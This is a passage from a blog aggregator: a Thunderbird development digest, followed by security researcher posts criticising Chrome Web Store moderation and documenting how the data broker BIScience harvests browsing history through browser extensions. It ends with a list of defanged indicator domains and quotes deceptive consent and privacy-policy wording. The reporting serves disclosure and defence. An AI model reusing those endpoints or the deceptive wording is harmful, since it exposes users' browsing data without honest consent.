Prior to the team taking their winter break, a cascade of deliverables passed the patch review process and landed in Daily. A healthy cadence of task completion saw a number of features reach users and lift the team’s spirits:

  • Copy to EWS from other protocol
  • Folder create
  • Enhanced logging
  • Local Storage
  • Save & manipulate Draft
  • Folder delete
  • Fix Edit Draft

Keep track of feature delivery here.

Account Hub

The overhauled Account Hub passed phase 1 QA review! A smaller team is handling phase 2 enhancements now that the initial milestone is complete. Our current milestone includes tasks for density and font awareness, refactoring of state management, OAuth prompts and more, which you can follow via Meta bug & progress tracking.

Global Database & Conversation View

Progress on the global database project was significant in the tail end of 2024, with foundational components taking shape. The team has implemented a database for folder management, including support for adding, removing, and reordering folders, and code for syncing the database with folders on disk. Preliminary work on a messages table and live view system is underway, enabling efficient filtering and handling of messages in real time. We have developed a mock UI to test these features, along with early documentation. Next steps include transitioning legacy folder and message functionality to a new “magic box” system, designed to simplify future refactoring and ensure a smooth migration without a disruptive “Big Bang” release.

Encryption

The future of email encryption has been on our minds lately. We have planned and started work on bridging the gap between some of the factions and solutions which are in place to provide quantum-resistant solutions in a post-quantum world. To provide ourselves with the breathing room to strategize and bring stakeholders together, we’re looking to hire a hardening team member who is familiar with encryption and comfortable with lower level languages like C. Stay tuned if this might be you!

In-App Notifications

With phase 1 of this project complete, we uplifted the feature to 134.0 Beta and notifications were shared with a significant number of users on both beta and daily releases in December. Data collected via Glean telemetry uncovered a couple of minor issues that have been addressed. It also provided peace of mind that the targeting system works as expected. Phase 2 of the project is well underway, and we have already uplifted some features and now merged them with 135.0 BetaMeta Bug & progress tracking.

Folder & Message Corruption

In the aftermath of our focused team effort to correct corruption issues introduced during our 2023 refactoring and solve other long-standing problems, we spent some time in self-reflection to perform a post mortem on the processes, decisions and situations which led to data loss and frustrations for users. While we regret a good number of preventable mistakes, it is also helpful to understand things outside of our control which played a part in this user-facing problem. You can find the findings and action plan here. We welcome any productive recommendations to improve future development in the more complex and arcane parts of the code.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month after FOSDEM!

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – December 2024 appeared first on The Thunderbird Blog.

Wladimir PalantChrome Web Store is a mess

Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?

Screenshot of the Chrome download page. A subtitle “Extend your experience” is visible with the text “From shopping and entertainment to productivity, find extensions to improve your experience in the Chrome Web Store.” Next to it a screenshot of the Chrome browser and some symbols on top of it representing various extensions.

Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.

As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.

Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.

Some recent examples

Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:

Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.

So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.

In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users on the number of trees they supposedly plant, incentivizing users into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.

Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made up numbers of trees they supposedly planted. Google even advertises for the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much about being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.

But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?

Screenshot of a query string parameters listing. The values listed include current_url (a Yahoo address with an email address in the query string), tab_id, user_id, distinct_id, local_time.

Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged, it will still notify their server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point but now it is back.

Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.

Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.

With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report two extensions from my original list still appeared to include that hidden affiliate fraud functionality and I found seven new ones that Google apparently didn’t notice.

The reporting process

Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:

Screenshot of an email: Hello Developer, Thank you again for reporting these items. Our team is looking into the items  and will take action accordingly. Please refer to the  possible enforcement (hyperlinked) actions and note that we are unable to comment on the status of individual items. Thank you for your contributions to the extensions ecosystem. Sincerely, Chrome Web Store Developer Support

This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.

Supposedly, the idea of not commenting on policy enforcement actions is hiding the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or due to the adjustments demanded by Google. It’s only me, the reporter of these issues, who needs to be guessing.

But, and this is a positive development, I’ve received a confirmation that both these reports are being worked on. This is more than I usually get from Google which is: silence. And typically also no visible reaction either, at least until a report starts circulating in media publications forcing Google to act on it.

But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way?

In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.

If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.

Sounds good, right? Except that the first option says:

At the bottom left of the window, click Flag Issue.

Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:

Screenshot of a web form offering a choice from the following options: Did not like the content, Not trustworthy, Not what I was looking for, Felt hostile, Content was disturbing, Felt suspicious

This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:

Your abuse report has been submitted successfully.

No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.

Well, there is another option listed in the document:

If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.

Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t that. If we try the form nevertheless it gives us a promising selection:

Screenshot of a web form titled “Select the reason you wish to report content.” The available options are: Policy (Non-legal) Reasons to Report Content, Legal Reasons to Report Content

Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:

Screenshot of a web form titled “Select the reason you wish to report content.” The only available option is: Child sexual abuse material

That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?

We can go back and try “Legal Reasons to Report Content” of course but the options available are really legal issues: intellectual properties, court orders or violations of hate speech law. This is another dead end.

It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean: I get it that Google must be getting lots of non-sense reports. And they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.

In 2019 Google launched the Developer Data Protection Reward Program (DDPRP) meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste, pretty much no issue would qualify for the program. But at least it was a reliable way to report issues which might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.

It’s not that I am very convinced of DDPRP’s performance. I’ve used that program twice. First time I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. The report was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, but that might have been due to the media coverage. The benefit of the program was really: it was a documented way of reaching a human being at Google that would look at a problematic extension.

Chrome Web Store and their spam issue

In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.

I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.

And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google was made aware of this particular trick a year before my blog post already. And again, for some reason Google chose not to act.

Can extension reviews be trusted?

So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:

Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.

And the important part in the terms of service is:

Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.

Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, with their continuous stream of incoming five star reviews.

A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five star reviews on a single day in September – and only a single (negative) review since then. I pointed out that it is a consistent pattern across all extensions of this account, e.g. another extension (merely 30 users) received 9 five star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.

Screenshot of seven reviews, all giving five stars and all from September 19, 2024. Top review is by Sophia Franklin saying “solved all my proxy switching issues. fast reliable and free.” Next review is by Robert Antony saying “very  user-friendly and efficient for managing proxy profiles.” The other reviews all continue along the same lines.

And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.

It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.

With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes it’s the overwhelmingly positive or meaningless content. At this point, any user ratings with the average above 4 stars likely have been messed with.

The “featured” extensions

But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:

Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:

  1. Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
  2. A store listing page that is clear and helpful for users, with quality images and a detailed description.

Yet looking through 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot really be thorough.

To provide a more tangible example, Chrome Web Store currently has Blaze VPN, Safum VPN and Snap VPN extensions carry the “Featured” badge. These extensions (along with Ishaan VPN which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN which was removed from Chrome Web Store in 2021. And they also don’t even work, no connections succeed. The extension not working is something users of Nucleus VPN complained about already, a fact that the extension compensated with fake reviews.

So it looks like the main criteria for awarding the “Featured” badge are the things which can be easily verified automatically: user count, Manifest V3, claims to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on the user interface and generally extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.

In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge. That’s because the website algorithm seems to weigh the badge considerably towards the extension’s ranking.

How did Google get into this mess?

Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extensions ecosystem was Mozilla’s, having been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome developers noticed of course: essentially unrestricted privileges necessitated very thorough reviews before extensions could be published on Mozilla Add-ons website, due to high damage potential of the extensions (both intentional and unintentional). And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.

Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.

Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.

Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.

It’s only with the introduction of Manifest V3 now that Chrome finally prohibits remote hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.

And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:

The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.

Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.

And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how they can request more privileges for their extensions while fending off complains from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.

So what we have now is:

  1. Automated review tools that malicious actors willing to invest some effort can work around.
  2. Lots of extensions with the potential for doing considerable damage, yet little way of telling which ones have good reasons for that and which ones abuse their privileges.
  3. Manual reviews being very expensive due to historical decisions.
  4. Massively inflated extension count due to unchecked spam.

Number 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies which can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.

What could Google do?

If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.

As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.

But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even with Chrome extensions not being usable, Chrome will likely stay the dominant browser.

In fact, Google has significant incentives to keep a particular class of extensions low, so one might even suspect intention behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.

Wladimir PalantBIScience: Collecting browsing history under false pretenses

  • This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.

Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.

This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.

Screenshot of a website citing a bunch of numbers: 10 Million+ opt-in panelists globally and growing, 60 Global Markets, 4.5 Petabyte behavioral data collected monthly, 13 Months average retention time of panelists, 250 Million online user events per day, 2 Million eCommerce product searches per day, 10 Million keyword searches recorded daily, 400 Million unique domains tracked daily<figcaption> Screenshot of claims on the BIScience website </figcaption>

Who is BIScience?

BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.

“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.

According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.

BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.

BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.

BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.

BIScience collects data from millions of users

BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.

The websites of BIScience and AdClarity make the following claims:

  • They collect data from 25 million users, over 250 million user events per day, 400 million unique domains
  • They process 4.5 petabytes of data every month
  • They are the “largest human panel based ad intelligence platform”

These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.

BIScience buys data from partner third-party extensions

BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.

Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.

Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.

BIScience receives raw data, not anonymized data

Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.

If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.

Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.

As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.

Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.

BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):

In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.

Misleading CWS policies compliance

When you read the Chrome Web Store privacy disclosures on every extension listing, they say:

This developer declares that your data is

  • Not being sold to third parties, outside of approved use cases
  • Not being used or transferred for purposes that are unrelated to the item’s core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

You might wonder:

  1. How is BIScience allowed to sell user data from their own extensions to third parties, through AdClarity and other BIScience products?
  2. How are partner extensions allowed to sell user data to BIScience, a third party?

BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:

  • if necessary to providing or improving your single purpose;
  • to comply with applicable laws;
  • to protect against malware, spam, phishing, or other fraud or abuse; or,
  • as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user

The Limited Use policy later states:

All other transfers, uses, or sale of user data is completely prohibited, including:

  • Transferring, using, or selling data for personalized advertisements.
  • Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
  • Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.

BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.

Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.

This is despite the CWS User Data FAQ stating (emphasis ours):

  1. Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
    No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.

In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.

Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.

We have the receipts contracts, emails, and more to prove BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily for the purpose of “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.

BIScience extensions exception claims

Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.

These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs in servers, therefore they do not need to collect this data. They certainly don’t need to sell it to third parties.

Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.

Partner extensions exception claims, guided by BIScience

Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.

We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.

BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.

The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.

BIScience SDK

The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.

The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can allege they offer safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs minimal functionality to pass casual examination. We confirmed this endpoint also collects user data to resell it, which is unrelated to the safe browsing protection.

Unnecessary features

Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.

Let’s look at this illuminating graphic, sent by BIScience to one of our sources:

A block diagram titled “This feature, whatever it may be, should justify to Google Play or Google Chrome, why you are looking for access into users url visits information.” The scheme starts with a circle labeled “Get access to user’s browsing activity.” An arrow points towards a rectangle labeled “Send all URLs, visited by user, to your backend.” An arrow points to a rhombus labeled “Does the particular URL meets some criteria?” An asterisk in the rhombus points towards a text passage: “The criteria could fall under any of your preferences: -did you list the URL as malware? -is the URL a shopping website? -does the URL contain sensitive data? -is the URL travel related? etc.” An arrow labeled “No” points to a rectangle labeled “Do nothing; just store the URL and meta data.” An arrow labeled “Yes” points to a rectangle labeled “Store URL and meta data; provide related user functionality.” Both the original question and yes/no paths are contained within a larger box labeled “User functionality” but then have arrows pointing to another rectangle outside that box labeled “Send the data to Biscience endpoint.”

Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.

Misleading privacy policy disclosures

BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:

Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:

  • Detect and suggest to close malware websites;
  • Analytics and Traffic Intelligence

This and other suggested clauses contradict each other or are misleading to users.

Quick fact check:

  • Extension doesn’t sell your personal data: False, the main purpose of the integration with BIScience is to sell browsing history data.
  • Extension needs to share your personal data: False, this is not necessary for everyday business. Much less for veiled reasons such as malware protection or analytics.

An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.

Misleading user consent

BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.

As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:

Screenshot of a pop-up titled “Visual Effects is now offering Safe-Meeting.” The text says: “To allow us to enable integrated anti-mining and malicious site protection for the pages you visit please click agree to allow us access to your visited websites. Any and all data collected will be strictly anonymous.” Below it a prominent button with the label “Agree” and a much smaller link labeled “Disagree.”

We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.

Our hope for the future

When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.

Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.

If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.

Browser extension users deserve better privacy and transparency.

Related reading

If you want to learn more about browser extensions collecting your browsing history for profit:

IOCs

The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.

We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.

Collection endpoints seen in third-party extensions:

  • sclpfybn[.]com
  • tnagofsg[.]com

Collection endpoints seen in BIScience-owned extensions and software:

  • urban-vpn[.]com
  • ducunt[.]com
  • adclarity[.]com

Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):

  • sandvpn[.]com
  • getsugar[.]io

